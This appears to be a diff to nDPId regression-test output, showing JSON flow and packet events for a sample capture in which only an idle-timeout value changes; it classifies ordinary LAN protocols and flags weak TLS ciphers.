+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -321,7 +321,7 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
@@ -362,12 +362,12 @@ 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -399,7 +399,7 @@ 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -418,10 +418,10 @@ 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} 
